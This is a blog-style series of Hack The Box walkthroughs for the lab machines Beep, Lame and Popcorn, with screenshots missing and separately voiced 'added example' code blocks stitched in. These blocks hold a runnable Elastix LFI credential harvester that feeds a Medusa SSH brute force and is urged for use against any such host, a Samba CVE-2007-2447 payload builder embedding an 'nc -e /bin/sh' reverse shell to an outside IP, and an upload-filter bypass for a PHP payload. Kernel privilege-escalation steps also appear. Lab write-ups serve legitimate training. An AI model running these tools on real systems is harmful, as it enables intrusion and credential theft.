
Wednesday, January 9, 2019

Beep


BEEP


- Layout for this exercise:





1 - INTRODUCTION


- The goal of this exercise is to develop a hacking process for the vulnerable machine Beep, a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu/


2 - ENUMERATION

Beep's IP is 10.10.10.7:




- Scanning with Nmap:




- When connecting to the web server at port 80 HTTP there is a redirection to port 443 HTTPS, where an Elastix application is running:




- Dirbusting the web server with wordlist big.txt:




- Trying default Elastix credentials such as admin:admin or admin:password, and browsing to the /admin folder, an HTTP Basic "Authentication Required" prompt is shown:





- Also, from folder /admin we learn that Beep runs FreePBX 2.8.1.4: 





- Going to folder /vtigercrm we learn that Beep runs vtiger CRM 5:





- Checking port 10000, where Webmin is running:









- The authentication form reveals session_login.cgi:








3 - EXPLOITATION


- Let's use two ways to exploit the vulnerable machine Beep:

3.1 - WEBMIN

- We can try to get a reverse shell by using the bash one-liner from this cheat sheet:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet





- Setting up a Netcat listener on port 1234:




- curl delivers the bash script to the target, using options -k (accept the self-signed certificate without verification) and -H (send the payload in an extra HTTP header):




- As a result, the listener receives a reverse shell running as root:





3.2 - ELASTIX LOCAL FILE INCLUSION

- Elastix 2.2.0 is vulnerable to several exploits, for instance this one:




- Reading the exploit's instructions, the current_language parameter of graph.php allows a Local File Inclusion:





- Following the instructions:




- Viewing the page source, the included file is now readable:





- There are some interesting lines which must be noted, for instance:









- Also, we can use the LFI to get /etc/passwd:




- Unfortunately access to /etc/shadow is denied: it is readable only by root, and the LFI runs with the privileges of the web server process:




- In the same way, let's have a look at /etc/asterisk/manager.conf:




- Now it is time to brute-force the SSH service with the recovered credentials.


- Let's create one file for users (picking the most relevant ones from the previous lists) and another one for passwords:




- Medusa does the work for us:





- Finally, a remote root shell is obtained by connecting over SSH with the credentials root:jEhdIekWmdjE (the password reused from the configuration files):
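The whole 3.2 chain (LFI, read the configuration files, harvest passwords and login names, feed Medusa) as one added example; this is not the post's own script and not the referenced exploit. The request shape is an assumption taken from the Elastix 2.2.0 exploit the page points to: `/vtigercrm/graph.php?current_language=../../..<file>%00&module=Accounts&action`, where the null byte cuts off the suffix graph.php appends to the language name. The configuration and passwd samples at the bottom are constructed in the format of the real files.

```python
"""Added example for the LFI-to-SSH chain above; not the page's own script.
ASSUMPTIONS: the request shape comes from the referenced Elastix 2.2.0 exploit,
  /vtigercrm/graph.php?current_language=../../..<file>%00&module=Accounts&action
where %00 cuts off the suffix the script appends to the language name, so any
file the web server user can read is echoed into the page. Network I/O lives
only in main(); the parsers run on the constructed samples at the bottom.
"""
import re
import ssl
import sys
import urllib.request
from html import unescape

TRAVERSAL = "../" * 8
# key=value / key = value secrets as written in amportal.conf and manager.conf.
SECRET_RE = re.compile(r"^\s*(\w*(?:pass|password|secret)\w*)\s*=\s*([^\s#;]+)",
                       re.I | re.M)
NO_LOGIN = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/bin/sync",
            "/sbin/halt", "/sbin/shutdown"}


def lfi_url(host: str, path: str) -> str:
    return (f"https://{host}/vtigercrm/graph.php?current_language="
            f"{TRAVERSAL}{path.lstrip('/')}%00&module=Accounts&action")


def fetch(url: str) -> str:
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE          # self-signed cert, like curl -k
    with urllib.request.urlopen(url, context=ctx, timeout=15) as resp:
        return resp.read().decode(errors="replace")


def harvest_secrets(text: str) -> dict:
    """Map config key -> value for every credential-looking assignment."""
    return {k: v for k, v in SECRET_RE.findall(unescape(text))}


def harvest_users(passwd: str) -> list:
    """Login names from /etc/passwd that have a real shell (SSH candidates)."""
    users = []
    for line in passwd.splitlines():
        f = line.split(":")
        if len(f) == 7 and f[6].strip() not in NO_LOGIN:
            users.append(f[0])
    return users


def password_list(texts) -> list:
    """Unique passwords, in order of first appearance, across several files."""
    seen = []
    for t in texts:
        for v in harvest_secrets(t).values():
            if v not in seen:
                seen.append(v)
    return seen


def medusa_cmd(host: str, users="users.txt", passwords="passwords.txt") -> str:
    # -U/-P take the wordlists, -M ssh selects the SSH module.
    return f"medusa -h {host} -U {users} -P {passwords} -M ssh"


def main(host: str) -> None:
    amportal = fetch(lfi_url(host, "/etc/amportal.conf"))
    manager = fetch(lfi_url(host, "/etc/asterisk/manager.conf"))
    passwd = fetch(lfi_url(host, "/etc/passwd"))
    with open("users.txt", "w") as fh:
        fh.write("\n".join(harvest_users(passwd)) + "\n")
    with open("passwords.txt", "w") as fh:
        fh.write("\n".join(password_list([amportal, manager])) + "\n")
    print(medusa_cmd(host))


# Constructed samples in the format of the files read above (not Beep's real files).
SAMPLE_AMPORTAL = """AMPDBHOST=localhost
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
"""
SAMPLE_MANAGER = """[general]
enabled = yes
port = 5038
[admin]
secret = jEhdIekWmdjE
permit=127.0.0.1/255.255.255.0
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
asterisk:x:100:101:Asterisk PBX:/var/lib/asterisk:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
"""

if __name__ == "__main__":
    main(sys.argv[1])   # usage: python3 elastix_lfi.py 10.10.10.7
```

The point of collecting every PASS/SECRET value rather than eyeballing the page source is that PBX installs tend to reuse one password across the database, the AMI and the web admin, so a handful of harvested values covers most of the local accounts; the same script is the first thing to check against any host that exposes a null-byte LFI in a PHP application.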







4 - CAPTURING THE FLAGS

- Reading the 1st flag user.txt:




- Looking up the 1st flag (an MD5-looking hex string) in an online hash database; MD5 is not decrypted, the site only matches it against precomputed hashes:





- Reading the 2nd flag root.txt:




- Looking up the 2nd flag in the same way:














Friday, January 4, 2019

Lame


LAME

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Lame, a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu/






2 - ENUMERATION

- Lame's IP is 10.10.10.3:




- Scanning with Nmap:





3 - VULNERABILITY

- The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the SamrChangePassword function, when the username map script smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the remote printer and file share management.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2447


- The Metasploit module exploit/multi/samba/usermap_script takes advantage of that vulnerability:
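To make the CVE-2007-2447 description above concrete, here is an added example (not the post's code and not the Metasploit module) that builds the user name which triggers the injection and audits an smb.conf plus a Samba version banner for the vulnerable condition, so the same check works from the defender's side. The smb.conf samples are constructed; the script path in them is invented for illustration.

```python
"""Added example for CVE-2007-2447 (Samba 'username map script'); not the
page's own code and not Metasploit's module. It builds the user name that
triggers the injection and audits an smb.conf plus a Samba version banner
for the vulnerable condition. Sample configs below are constructed.
"""
import re
from typing import Optional

VULN_OPTION = "usernamemapscript"   # Samba ignores case and spaces in option names


def injected_username(cmd: str) -> str:
    # smbd passes the user name to the map script through /bin/sh -c, so the
    # backtick substitution runs before the script does. '/=' is the harmless
    # prefix the Metasploit module uses; nohup keeps the command alive.
    return f"/=`nohup {cmd}`"


def _norm(key: str) -> str:
    return re.sub(r"\s+", "", key).lower()


def parse_smb_conf(text: str) -> dict:
    """Minimal smb.conf reader: {section: {normalised option: value}}."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # Samba comment markers
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            k, v = line.split("=", 1)
            sections[current][_norm(k)] = v.strip()
    return sections


def map_script(conf: dict) -> Optional[str]:
    return conf.get("global", {}).get(VULN_OPTION)


def version_vulnerable(banner: str) -> bool:
    """3.0.0 through 3.0.25rc3 are affected; 3.0.25 final and later are fixed."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(rc\d+)?", banner)
    if not m:
        return False
    major, minor, patch, rc = int(m[1]), int(m[2]), int(m[3]), m[4]
    return (major, minor) == (3, 0) and (patch < 25 or (patch == 25 and rc is not None))


def assess(conf_text: str, banner: str) -> str:
    conf = parse_smb_conf(conf_text)
    script = map_script(conf)
    if script and version_vulnerable(banner):
        return f"VULNERABLE: '{script}' runs with attacker-controlled user names on Samba {banner}"
    if script:
        return f"option present ('{script}') but Samba {banner} is outside the affected range"
    return "not exposed: no 'username map script' in [global]"


# Constructed samples: the weak configuration and the corrected one
# (the option removed; upgrading past 3.0.25 is the other fix).
WEAK_CONF = """[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   guest ok = yes
"""
FIXED_CONF = WEAK_CONF.replace(
    "   username map script = /etc/samba/scripts/mapusers.sh\n", "")

if __name__ == "__main__":
    print(injected_username("nc -e /bin/sh 10.10.14.2 4444"))
    print(assess(WEAK_CONF, "3.0.20-Debian"))
    print(assess(FIXED_CONF, "3.0.20-Debian"))
```

Note that anonymous access is enough to reach the injection, because the user name is mapped before any authentication succeeds; that is why a guest-accessible share like the constructed [tmp] above is all an attacker needs.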






4 - EXPLOITATION

- Metasploit provides a straightforward exploitation, returning a remote root shell:






- Improving the shell:





5 - CAPTURING THE FLAG

- There are two flags to be discovered.

- First, reading user.txt:




- Looking up the MD5-looking string in an online hash database (MD5 is not reversible; such sites only match precomputed hashes):





- Second, reading root.txt:




- Looking up the MD5-looking string in the same way:









Thursday, January 3, 2019

Popcorn


POPCORN

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Popcorn, a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu/




2 - ENUMERATION

- Popcorn's IP is 10.10.10.6:



- Scanning with Nmap:





- Connecting with the browser:




- Dirbusting the web server:




- There is an interesting directory, /torrent, which hosts a Torrent Hoster application:





- The Upload tab might be promising:




- A login form is presented to the user:





- Creating a new user whitelist:whitelist with Sign Up:









- Login as whitelist:





- Clicking Upload to upload torrent files:





- Downloading Kali's torrent file from the original repository:





 


- Uploading Kali's torrent to Popcorn:







- Changing category to Other/Other (otherwise the upload doesn't work):





- The upload is successful:







- Clicking the filename, it seems that the Screenshot can be changed by uploading a new image with an extension such as jpg, jpeg, gif or png:







3 - EXPLOITATION

- The attack consists of uploading a PHP payload to Popcorn's web server through the screenshot upload, requesting it so that it runs, and catching the reverse shell connection.


- Creating the payload with Msfvenom and saving it as exploit.php:







- However, exploit.php will probably be rejected by the upload filter, since it is not one of the expected image files:







- Let's intercept the submission with Burp:




- Submitting exploit.php:




- Let's focus on this line:



- Changing to:




- Forwarding the modified request:




- The submission is successful:
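The Burp edit above, reproduced as an added example (not Torrent Hoster's code and not the post's own): it crafts the multipart body that sends exploit.php with an image Content-Type, then shows why a server-side check that trusts the client-supplied Content-Type accepts it while a check on extension and magic bytes does not. That the edited line is the part's Content-Type header is an assumption, as are the form field name and the boundary; the request bodies below are constructed.

```python
"""Added example for the upload bypass above; not Torrent Hoster's code.
ASSUMPTIONS: the line edited in Burp is the file part's Content-Type header;
the field name 'file' and the boundary are made up. The multipart bodies are
constructed in-line so the weak and the hardened check can be compared.
"""
import os
import re
import secrets

ALLOWED_TYPES = {"image/jpeg", "image/gif", "image/png"}
MAGIC = {                       # first bytes of each allowed image format
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def build_multipart(boundary: str, filename: str, content_type: str,
                    data: bytes, field: str = "file") -> bytes:
    """Body of a multipart/form-data POST carrying one file part."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n")
    return head.encode() + data + f"\r\n--{boundary}--\r\n".encode()


def parse_multipart(body: bytes, boundary: str) -> list:
    """File parts as dicts with filename, content_type and data (server side)."""
    parts = []
    for chunk in body.split(f"--{boundary}".encode()):
        if not chunk.strip() or chunk.strip() == b"--":
            continue                                  # preamble / closing marker
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = head.decode(errors="replace")
        fn = re.search(r'filename="([^"]*)"', headers)
        ct = re.search(r"Content-Type:\s*([^\r\n]+)", headers, re.I)
        if fn:
            parts.append({"filename": fn[1],
                          "content_type": ct[1].strip() if ct else "",
                          "data": data[:-2] if data.endswith(b"\r\n") else data})
    return parts


def weak_check(part: dict) -> bool:
    # The mistake the Burp edit exploits: the Content-Type is whatever the
    # client wrote into the request, so it proves nothing about the bytes.
    return part["content_type"] in ALLOWED_TYPES


def strong_check(part: dict) -> bool:
    # Extension whitelist plus magic bytes, both derived from the upload itself.
    ext = os.path.splitext(part["filename"])[1].lstrip(".").lower()
    return (ext in MAGIC and part["data"].startswith(MAGIC[ext])
            and part["content_type"] in ALLOWED_TYPES)


def stored_name(part: dict) -> str:
    # Never keep the client's name: random basename, extension from the whitelist.
    ext = os.path.splitext(part["filename"])[1].lstrip(".").lower()
    return f"{secrets.token_hex(8)}.{ext}"


# Constructed requests: the spoofed upload, the honest one, and a real image.
BOUNDARY = "----WebKitFormBoundaryConstructed"
PHP_STUB = b"<?php /* msfvenom payload would go here */ ?>"
SPOOFED = build_multipart(BOUNDARY, "exploit.php", "image/png", PHP_STUB)
HONEST = build_multipart(BOUNDARY, "exploit.php", "application/x-php", PHP_STUB)
REAL_PNG = build_multipart(BOUNDARY, "shot.png", "image/png", MAGIC["png"] + b"\x00" * 16)

if __name__ == "__main__":
    for label, body in (("spoofed", SPOOFED), ("honest", HONEST), ("png", REAL_PNG)):
        part = parse_multipart(body, BOUNDARY)[0]
        print(f"{label:8} weak={weak_check(part)!s:5} strong={strong_check(part)}")
```

Even strong_check is not the whole fix: a valid PNG header followed by PHP still passes it, so the upload directory must also be served without script execution (or kept outside the web root) and files renamed as stored_name does, which removes the "browse to /torrent/upload/exploit.php" step the attack relies on.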




- Now, where has exploit.php been uploaded?

- Dirbusting the folder /torrent we find a directory called upload:







- Connecting to /upload we locate exploit.php:






- Now, setting up a Meterpreter listener:




- To run exploit.php, just request it in the browser:




- The Meterpreter session is achieved:




- Reading information about the system:







- Getting a remote shell:




- Improving the shell with:





- Going to /home and listing content:




- Going to user george's folder:




- Reading user's flag:





4 - PRIVILEGE ESCALATION

- Let's exploit the kernel in two ways:

4.1 - Dirtycow

- The kernel 2.6.31 is vulnerable to Dirty COW (CVE-2016-5195), exploited here with dirty.c:




- Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel, a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem.


https://en.wikipedia.org/wiki/Dirty_COW





- According to its instructions, dirty.c adds a new user called firefart with a password chosen by the attacker, by writing a UID 0 entry into /etc/passwd through the race (the original file is backed up to /tmp/passwd.bak).

- Copying the exploit and storing it locally on Kali:







- Transferring dirty.c to Popcorn:




- Compiling dirty.c by following the instructions:







- Running dirty and entering the new password hola:




- Switching to the user firefart (su firefart, password hola) we get a root shell:





4.2 - Full-Nelson.c Local Privilege Escalation

- Also, the kernel 2.6.31 is vulnerable to the exploit 15704.c (full-nelson.c, which chains CVE-2010-4258 with CVE-2010-3849 and CVE-2010-3850):





- Downloading 15704.c to Kali:





- Transferring 15704.c from Kali to Popcorn's /tmp folder:







- Compiling 15704.c according to the instructions:







- Running the exploit, a root shell is achieved:





5 - CAPTURING THE FLAG

- Reading root.txt: